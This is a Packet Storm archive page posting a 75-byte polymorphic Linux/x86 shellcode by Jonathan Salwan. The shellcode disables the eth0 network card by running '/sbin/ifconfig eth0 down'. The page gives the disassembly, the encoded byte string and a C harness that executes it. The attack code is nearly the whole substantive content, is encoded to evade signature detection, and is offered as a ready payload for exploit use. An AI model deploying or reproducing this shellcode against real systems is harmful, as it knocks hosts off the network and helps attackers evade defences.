exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Polymorphic Shellcode To Disable eth0

Polymorphic Shellcode To Disable eth0
Posted Aug 17, 2009
Authored by Jonathan Salwan | Site shell-storm.org

eth0 network card disabling polymorphic shellcode for Linux/x86.

tags | x86, shellcode
systems | linux
SHA-256 | b27693455f31b2416b2f93393c268807021608c34376c422293af6af3589d84b

Polymorphic Shellcode To Disable eth0

Change Mirror Download
/*  Linux x86 - Polymorphic shellcode for disable Network Card (default eth0) - 75 bytes
* Jonathan Salwan < submit [!] shell-storm.org >
*
* ! DataBase of Shellcodes and you can share your shellcodes : http://www.shell-storm.org/shellcode/ !
*
*
* Disassembly of section .text:
*
* 08048060 <_start>:
* 8048060: 6a 0b push $0xb
* 8048062: 58 pop %eax
* 8048063: 99 cltd
* 8048064: 52 push %edx
* 8048065: 68 64 6f 77 6e push $0x6e776f64
* 804806a: 89 e6 mov %esp,%esi
* 804806c: 52 push %edx
* 804806d: 68 65 74 68 30 push $0x30687465 < (eth0) you can change it for other Network card
* 8048072: 89 e1 mov %esp,%ecx
* 8048074: 52 push %edx
* 8048075: 68 6e 66 69 67 push $0x6769666e
* 804807a: 68 69 66 63 6f push $0x6f636669
* 804807f: 68 69 6e 2f 2f push $0x2f2f6e69
* 8048084: 68 2f 2f 73 62 push $0x62732f2f
* 8048089: 89 e3 mov %esp,%ebx
* 804808b: 52 push %edx
* 804808c: 56 push %esi
* 804808d: 51 push %ecx
* 804808e: 53 push %ebx
* 804808f: 89 e1 mov %esp,%ecx
* 8048091: cd 80 int $0x80
*
*/

main()
{
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x51\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x69\x65\x70"
"\x78\x6f\x8a\xe7\x53\x69\x66\x75"
"\x69\x31\x8a\xe2\x53\x69\x6f\x67"
"\x6a\x68\x69\x6a\x67\x64\x70\x69"
"\x6a\x6f\x30\x30\x69\x30\x30\x74"
"\x63\x8a\xe4\x53\x57\x52\x54\x8a"
"\xe2\xce\x81";

printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close